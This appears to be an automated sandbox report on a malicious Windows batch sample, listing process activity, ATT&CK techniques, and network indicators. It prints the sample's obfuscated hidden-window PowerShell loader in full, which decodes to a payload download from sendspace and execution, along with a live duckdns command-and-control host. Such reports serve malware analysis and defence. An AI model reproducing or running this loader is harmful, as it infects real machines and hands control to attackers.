        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$vanddraabes = 1;$precautioning='sub';$precautioning+='strin';$precautioning+='g';function forfladigelsens($tusmrkets152){$tsp=$tusmrkets152.length-$vanddraabes;for($velours=5;$velours -lt $tsp;$velours+=6){$ventin+=$tusmrkets152.$precautioning.invoke( $velours, $vanddraabes);}$ventin;}function inddatafiler223($dorathea){. ($rull) ($dorathea);}$gianthood=forfladigelsens ' ame.mbirtho terszunchaienepilsynkrlreassagasco/ pan,5gub.e. stat0sjlen stab,(tilh,wgod eivilstn kompd undeosalpiwh lhes symp g njansp,citream. maal1genne0matem.euro,0 norm;hed,s hjnelw iegfipneu n opfl6preim4induk;cleis unc,nxdecon6 glob4unbra;stutt krsenr.ybbjvmatri:tende1f rku2 lejl1under.impu.0gy,ur)ordre redepgrela.estaalc rofokb,nhao cart/cy ni2.ubdi0ag ic1.emix0re.ie0myrmi1under0 yndi1 lyst anticf unshisylphrur.nvephotof te to akkox stup/pleje1 purc2 cela1ko,me.enarb0,orca ';$varmepudes=forfladigelsens ' ammeudelitswatere.ejdsrdemon- unrealeap ghennee ultrnirreftlandb ';$radernes=forfladigelsens 'spildhkrsustsotadtpreinp ,lamstillb:satis/ gust/shamew mergwhierowgend..scia s resyereinfn indkdqueevsddsdope cepaevangcgyptoeernri.offercunf.ioov.rbmbrugs/vandepunf lrlsri.osubst/censud prehl.arak/mccar7linalyrdkriiunpe,2se,vif dewwu ety ';$koglespillets=forfladigelsens 'flyvn>overb ';$rull=forfladigelsens 'k emsitvillecampbxmodul ';$hvervende='limpindene';$bondages = forfladigelsens 'forvae,uculcpredohmar,no stan hande%hvidvatrio,pcampsp unt dwhupoa ,ntetsprudahyper% ieth\te,tipanstrrrestaetysseasyconfnyklaf fdeaisecanroksekmpicayab,saat tubeiattrivmunkeemadag.overcsundepplapidok.pit dulge&dimme& betu aabene violcsaumohzenogoch,pp godl,tryota ';inddatafiler223 (forfladigelsens 'ant a$sandwgfac,il,rojeo anaabtrskeabilfrl nons:chl,rt un,erejakuoved ummissolmatche u.dencircudl.lyaeopsam= ufor(b.ligcsmudsmfortidbalka oligo/skri.c ,ype krysa$ 
gejrbtriano.enkrnuaf jdsiph.aaltingaegeregenfosflip,)densi ');inddatafiler223 (forfladigelsens ' ena $f ralgforlalstenlobryggb nonea un,tlhokus:ranomu udenncreatf udmuoudr drdiatoke,dkkep,eendnmousnaz,cyesaftfsv.llass.ces= a.pr$hasperfj.rnaslui.d kommeund,frfillin tubie sttts afde.unhelsmn.dep ano ltilreic rpotreflu(orgia$ stjekcorreosyningkateglbade elavtrsapporpr.turihydrolherrel ,apoeexemptinrolsdinos)a ato ');$radernes=$unforkedness[0];$yojuane= (forfladigelsens '.irma$dissogindfjl bordoforfebunconadonn lceleb:indicsbyggem banipbilleic.alish.rsktun.eromar,il .etrequi krpres.nboha.ek,rne=,larmnnona,ecosufwshort-criolokarspb hebejoverde troccsner,t rypt stagns r,vaysepa sb.idgt xyloebinnomgymno.rekvinnoc aekajentresub.niveawdentierandsb cistcfin llportrifrekveenfamnnondot');$yojuane+=$tromlende[1];inddatafiler223 ($yojuane);inddatafiler223 (forfladigelsens 'clown$ entrs unubmrhetiplns.ai congs sablthusbeopolynlbacche ledoremmennhandeeteren. d.phhs,elleepizzariverdstande maalr silis trla[vadeh$al.idvcor ia anverunminm pe,oeb.pappvakkeutakstdsublue
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$vanddraabes = 1;$precautioning='sub';$precautioning+='strin';$precautioning+='g';function forfladigelsens($tusmrkets152){$tsp=$tusmrkets152.length-$vanddraabes;for($velours=5;$velours -lt $tsp;$velours+=6){$ventin+=$tusmrkets152.$precautioning.invoke( $velours, $vanddraabes);}$ventin;}function inddatafiler223($dorathea){. ($rull) ($dorathea);}$gianthood=forfladigelsens ' ame.mbirtho terszunchaienepilsynkrlreassagasco/ pan,5gub.e. stat0sjlen stab,(tilh,wgod eivilstn kompd undeosalpiwh lhes symp g njansp,citream. maal1genne0matem.euro,0 norm;hed,s hjnelw iegfipneu n opfl6preim4induk;cleis unc,nxdecon6 glob4unbra;stutt krsenr.ybbjvmatri:tende1f rku2 lejl1under.impu.0gy,ur)ordre redepgrela.estaalc rofokb,nhao cart/cy ni2.ubdi0ag ic1.emix0re.ie0myrmi1under0 yndi1 lyst anticf unshisylphrur.nvephotof te to akkox stup/pleje1 purc2 cela1ko,me.enarb0,orca ';$varmepudes=forfladigelsens ' ammeudelitswatere.ejdsrdemon- unrealeap ghennee ultrnirreftlandb ';$radernes=forfladigelsens 'spildhkrsustsotadtpreinp ,lamstillb:satis/ gust/shamew mergwhierowgend..scia s resyereinfn indkdqueevsddsdope cepaevangcgyptoeernri.offercunf.ioov.rbmbrugs/vandepunf lrlsri.osubst/censud prehl.arak/mccar7linalyrdkriiunpe,2se,vif dewwu ety ';$koglespillets=forfladigelsens 'flyvn>overb ';$rull=forfladigelsens 'k emsitvillecampbxmodul ';$hvervende='limpindene';$bondages = forfladigelsens 'forvae,uculcpredohmar,no stan hande%hvidvatrio,pcampsp unt dwhupoa ,ntetsprudahyper% ieth\te,tipanstrrrestaetysseasyconfnyklaf fdeaisecanroksekmpicayab,saat tubeiattrivmunkeemadag.overcsundepplapidok.pit dulge&dimme& betu aabene violcsaumohzenogoch,pp godl,tryota ';inddatafiler223 (forfladigelsens 'ant a$sandwgfac,il,rojeo anaabtrskeabilfrl nons:chl,rt un,erejakuoved ummissolmatche u.dencircudl.lyaeopsam= 
ufor(b.ligcsmudsmfortidbalka oligo/skri.c ,ype krysa$ gejrbtriano.enkrnuaf jdsiph.aaltingaegeregenfosflip,)densi ');inddatafiler223 (forfladigelsens ' ena $f ralgforlalstenlobryggb nonea un,tlhokus:ranomu udenncreatf udmuoudr drdiatoke,dkkep,eendnmousnaz,cyesaftfsv.llass.ces= a.pr$hasperfj.rnaslui.d kommeund,frfillin tubie sttts afde.unhelsmn.dep ano ltilreic rpotreflu(orgia$ stjekcorreosyningkateglbade elavtrsapporpr.turihydrolherrel ,apoeexemptinrolsdinos)a ato ');$radernes=$unforkedness[0];$yojuane= (forfladigelsens '.irma$dissogindfjl bordoforfebunconadonn lceleb:indicsbyggem banipbilleic.alish.rsktun.eromar,il .etrequi krpres.nboha.ek,rne=,larmnnona,ecosufwshort-criolokarspb hebejoverde troccsner,t rypt stagns r,vaysepa sb.idgt xyloebinnomgymno.rekvinnoc aekajentresub.niveawdentierandsb cistcfin llportrifrekveenfamnnondot');$yojuane+=$tromlende[1];inddatafiler223 ($yojuane);inddatafiler223 (forfladigelsens 'clown$ entrs unubmrhetiplns.ai congs sablthusbeopolynlbacche ledoremmennhandeeteren. d.phhs,elleepizzariverdstande maalr silis trla[vadeh$al.idvcor ia anverunminm pe,oe
        Source: wab.exe, 00000009.00000002.3255609581.0000000020FAD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020FBD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000021197000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program Manager@\]q
        Source: wab.exe, 00000009.00000002.3255609581.0000000021170000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020FAD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020FBD000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program Manager
        Source: wab.exe, 00000009.00000002.3255609581.0000000020FAD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020FBD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000021197000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program Manager@\]q&
        Source: wab.exe, 00000009.00000002.3255609581.0000000020FBD000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program ManagerTe]qx
        Source: wab.exe, 00000009.00000002.3255609581.0000000021170000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program Manager@\]qPaste_bin@\]q
        Source: wab.exe, 00000009.00000002.3255609581.0000000020FAD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020FBD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000021197000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program ManagerTe]q
        Source: wab.exe, 00000009.00000002.3255609581.0000000021170000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program Manager`,]q
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Program Files (x86)\Windows Mail\wab.exe  WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
        MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count shown by the report next to that technique)

        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
        Execution: Windows Management Instrumentation (11); Command and Scripting Interpreter (11); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers
        Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
        Privilege Escalation: Process Injection (112); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
        Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (112); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1)
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
        Discovery: Security Software Discovery (21); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (14); Remote System Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
        Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
        Command and Control: Encrypted Channel (11); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Multiband Communication; Commonly Used Port
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
        Behavior Graph (ID: 1446773, Sample: las.cmd, Startdate: 23/05/2024, Architecture: WINDOWS, Score: 100)

        Sample-level network: xvern429.duckdns.org; 198.187.3.20.in-addr.arpa; 3 other IPs or domains
        Sample-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 3 other signatures; Uses dynamic DNS services (attached to xvern429.duckdns.org)

        cmd.exe (started from the sample)
          Signatures: Suspicious powershell command line found; Very long command line found
          Child processes: powershell.exe; conhost.exe

        powershell.exe (started from cmd.exe)
          Network: fs03n3.sendspace.com 69.31.136.17, ports 443, 49705, 62797 (GTT-BACKBONEGTTDE, United States); www.sendspace.com 172.67.170.105, ports 443, 49704, 62796 (CLOUDFLARENETUS, United States)
          Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
          Child processes: powershell.exe; conhost.exe; cmd.exe

        powershell.exe (second instance, started from the first powershell.exe)
          Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
          Child processes: wab.exe; cmd.exe

        wab.exe (started from the second powershell.exe)
          Network: xvern429.duckdns.org 12.202.180.134, ports 62798, 8890 (FISERV-INCUS, United States)

        SourceDetectionScannerLabelLink
        las.cmd3%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://crl.microsoft | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://www.microsoft. | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://www.sendspace.com/pro/dl/7yi2fu | 0% | Avira URL Cloud | safe
https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJX | 0% | Avira URL Cloud | safe
https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/7yi2fuP | 0% | Avira URL Cloud | safe
http://www.sendspace.com | 0% | Avira URL Cloud | safe
https://fs03n4.sendspace.com | 0% | Avira URL Cloud | safe
https://fs03n3.sendspace.com/2 | 0% | Avira URL Cloud | safe
https://www.sendspace.com | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/7yi2fuXR | 0% | Avira URL Cloud | safe
https://fs03n3.sendspace.com/ | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/lt00vw5 | 0% | Avira URL Cloud | safe
https://www.sendspace.com/ | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/lt00vw | 0% | Avira URL Cloud | safe
https://fs03n4.sendspace.com/dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea | 0% | Avira URL Cloud | safe
https://fs03n4.sendspace.comX | 0% | Avira URL Cloud | safe
http://fs03n4.sendspace.com | 0% | Avira URL Cloud | safe
https://fs03n3.sendspace.com/om:443 | 0% | Avira URL Cloud | safe
https://fs03n4.sendspaX | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fs03n4.sendspace.com | 69.31.136.17 | true | false |  | unknown
fs03n3.sendspace.com | 69.31.136.17 | true | false |  | unknown
xvern429.duckdns.org | 12.202.180.134 | true | true |  | unknown
www.sendspace.com | 172.67.170.105 | true | false |  | unknown
198.187.3.20.in-addr.arpa | unknown | unknown | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.sendspace.com/pro/dl/7yi2fu | false | Avira URL Cloud: safe | unknown
https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/lt00vw | false | Avira URL Cloud: safe | unknown
https://fs03n4.sendspace.com/dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJX | wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://crl.microsoft | powershell.exe, 00000006.00000002.2437943823.0000000002F57000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n3.sendspace.com/2 | wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000003.00000002.2527053630.0000027ADAC36000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/7yi2fuXR | powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft. | powershell.exe, 00000003.00000002.2607346916.0000027AF1971000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n4.sendspace.com | powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/7yi2fuP | powershell.exe, 00000003.00000002.2527053630.0000027AD99FD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sendspace.com | powershell.exe, 00000003.00000002.2527053630.0000027ADB586000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com | powershell.exe, 00000003.00000002.2527053630.0000027AD99FD000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2527053630.0000027ADB097000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/lt00vw5 | wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n3.sendspace.com/ | wab.exe, 00000009.00000003.2435277716.0000000005437000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000002.3240674366.000000000541F000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000003.2790829519.000000000541F000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/ | wab.exe, 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fs03n4.sendspace.com | powershell.exe, 00000003.00000002.2527053630.0000027ADB5BE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2438796376.0000000004D01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n4.sendspace.comX | powershell.exe, 00000003.00000002.2527053630.0000027AD9C64000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.2527053630.0000027AD97D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n4.sendspaX | powershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.2527053630.0000027AD97D1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.2438796376.0000000004D01000.00000004.00000800.00020000.00000000.sdmp; wab.exe, 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp; wab.exe, 00000009.00000002.3255609581.0000000021114000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n3.sendspace.com/om:443 | wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
69.31.136.17 | fs03n4.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
12.202.180.134 | xvern429.duckdns.org | United States | 22983 | FISERV-INCUS | true
